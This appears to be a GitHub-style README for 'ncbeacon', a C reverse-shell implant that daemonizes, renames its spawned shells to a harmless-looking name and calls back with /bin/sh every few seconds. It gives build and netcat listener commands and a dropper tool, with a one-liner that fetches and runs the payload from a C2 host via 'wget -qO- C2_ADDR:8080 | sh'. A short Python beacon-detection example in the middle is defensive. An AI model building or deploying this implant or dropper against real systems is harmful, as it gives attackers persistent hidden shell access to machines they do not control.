A small beaconing implant meant to be caught with netcat. This was written after watching someone hack hackthebox boxes, lose his shell a few times, and have to re-exploit to get it back. All it does is call back every few seconds.
Features
- Calls back with `/bin/sh` hooked up to the TCP connection every 5 seconds
- Daemonizes itself
- Dissociates the shells it spawns from the parent process
- Spawned shells have a configurable name (i.e. `argv[0]`)
For legal use only, though you'd probably be doing law enforcement a favor if you used this for illegal purposes.
- Build it (replacing `CALLBACK_ADDRESS` with the correct address):
  ```
  cc -O2 -DCBADDR=CALLBACK_ADDRESS -o ncbeacon ncbeacon.c
  ```
- Put it on target:
  ```
  # This one's up to you
  ```
- Set up netcat to catch it:
  ```
  rlwrap nc -nvlp 4444
  ```
- Start it, on target:
  ```
  ./ncbeacon
  ```
There are a few compile-time settings controlled by macros (i.e. `-DNAME=VALUE`):

Macro | Required | Default | Description
---|---|---|---
CBADDR | Yes | None | Callback address
CBPORT | No | 4444 | Callback port
CBWAIT | No | 5 | Time between callbacks, in seconds
SHNAME | No | knetd | Name (`argv[0]`) of spawned shells
DEBUG | No | Unset | If set, logs errors and prevents backgrounding
One of the downsides of spawning a new process to call back every few seconds is that if something accepts the connection and never closes it, the process doesn't die. I'm looking at you, OpenBSD `nc(1)`. This can be solved by catching the connection with a tool which closes the listening socket after accepting a connection, such as ncat.
The included program nccatch will also happily catch a connection from ncbeacon. Build it with
```
cc -O2 -o nccatch nccatch.c
```
Give it either a port or an address and port, like `./nccatch 4444` or `./nccatch 127.0.0.1 4444`.
This is bad.
- No encryption
- No authentication
- Very frequent connection attempts
- Very regular connection attempts
- Connects up a shell to stdio (have a look at `/proc/$$/fd`)
In other words, this is pretty much only suitable for HTB and similar safe environments. Please don't use this for actual engagements unless you have a very good reason to.
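The "very frequent" and "very regular" points above are exactly what a network defender keys on: a fixed `CBWAIT` produces metronomic connection attempts that stand out against normal traffic. As an added example (not part of this project), the Python below groups connection-log lines by source and destination and flags flows whose inter-connection gaps are nearly constant; the log format, addresses and timestamps are constructed for the demo, not a real sensor's output.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log lines: "timestamp src -> dst:port". The first flow mimics a
# CBWAIT=5 beacon; the second is irregular browsing-style traffic.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 -> 192.0.2.10:4444
2024-01-01T10:00:05 10.0.0.5 -> 192.0.2.10:4444
2024-01-01T10:00:10 10.0.0.5 -> 192.0.2.10:4444
2024-01-01T10:00:15 10.0.0.5 -> 192.0.2.10:4444
2024-01-01T10:00:20 10.0.0.5 -> 192.0.2.10:4444
2024-01-01T10:00:03 10.0.0.7 -> 192.0.2.20:443
2024-01-01T10:00:41 10.0.0.7 -> 192.0.2.20:443
2024-01-01T10:02:09 10.0.0.7 -> 192.0.2.20:443
2024-01-01T10:02:11 10.0.0.7 -> 192.0.2.20:443
"""

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+:\d+)$")


def parse_log(text):
    """Return {(src, dst): [timestamps]}; lines that do not match the format are skipped."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst = m.groups()
            flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def interval_stats(timestamps):
    """(mean gap in seconds, coefficient of variation); CV near 0 means fixed-interval callbacks."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2 or mean(gaps) == 0:
        return None
    return mean(gaps), pstdev(gaps) / mean(gaps)


def find_beacons(text, min_connections=4, max_cv=0.1):
    """Flows with at least min_connections attempts whose spacing varies by no more than max_cv."""
    hits = {}
    for flow, stamps in parse_log(text).items():
        if len(stamps) < min_connections:
            continue
        stats = interval_stats(stamps)
        if stats is not None and stats[1] <= max_cv:
            hits[flow] = stats
    return hits
```

Real implants add jitter to defeat this exact check, so a low CV threshold catches ncbeacon but should be one signal among several rather than the whole detection.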
The included bin2dropper.sh will generate a shell script which drops and runs a payload. It takes a payload file and writes to stdout a script which will drop the payload, run it, and remove it. Prerequisites on target are openssl and gunzip.
Example:
```
./bin2dropper.sh -d sneaky ./ncbeacon | nc -Nnvl 8080 # On C2 infrastructure
cd /tmp; wget -qO- C2_ADDR:8080 | sh # On target
```
This will use wget to grab a script which drops `./ncbeacon` to `/tmp/sneaky` and runs it as `sneaky`.
You can now mark off "in-memory dropper execution" on your buzzword bingo card.